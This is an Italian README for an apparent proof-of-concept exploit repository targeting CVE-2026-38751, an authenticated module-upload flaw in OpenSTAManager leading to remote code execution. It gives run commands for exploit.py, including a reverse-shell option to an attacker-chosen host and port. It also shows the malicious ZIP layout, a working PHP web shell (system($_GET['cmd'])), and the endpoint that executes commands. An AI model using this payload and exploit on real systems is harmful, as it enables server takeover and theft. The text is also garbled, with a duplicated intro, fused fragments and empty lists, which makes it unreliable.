
Questa repository contiene un proof-of-concept (PoC) per CVE-2026-38751, che interessa OpenSTAManager ≤ 2.10. La vulnerabilità consente a un attaccante autenticato di caricare un modulo maligno tramite la funzionalità di aggiornamento dei moduli, portando al caricamento arbitrario di file e all'esecuzione di codice in remoto (RCE).
Questo repository contiene un exploit proof-of-concept (PoC) per CVE-2026-38751, che affligge OpenSTAManager ≤ 2.10. La vulnerabilità consente a un attaccante autenticato di caricare un modulo malevolo tramite la funzionalità di aggiornamento dei moduli, portando a caricamento arbitrario di file ed esecuzione di codice in remoto (RCE).
modules/aggiornamenti/upload_modules.php)La funzionalità di aggiornamento dei moduli consente a utenti autenticati di caricare moduli basati su ZIP senza una corretta validazione del contenuto dei file o dei limiti di esecuzione. Un attaccante può creare un modulo malevolo contenente payload PHP, che vengono poi distribuiti nella web root ed eseguiti tramite il contesto dell'applicazione. Questo comporta:
##Impatto Uno sfruttamento riuscito consente:
python exploit.py --build
Crea:
update.zip
└── run/
├── MODULE
└── evil.php
python exploit.py <username> <password> <target_url>
Modalità reverse shell opzionale:
python exploit.py <username> <password> <target_url> --lhost <IP> --lport <PORT>
Esempio di Payload
<?php
isset($_GET['cmd']) && system($_GET['cmd']);
?>
In caso di successo, il seguente endpoint esegue comandi di sistema:
/modules/run/evil.php?cmd=id
Questo progetto è pensato per:
Non utilizzarlo contro sistemi senza autorizzazione esplicita.
Note
Il rilevamento può variare a seconda della configurazione del server. Alcune distribuzioni potrebbero disabilitare l'esecuzione diretta di PHP nelle directory dei moduli. I tempi di attivazione del modulo potrebbero richiedere nuovi tentativi.
Riconoscimenti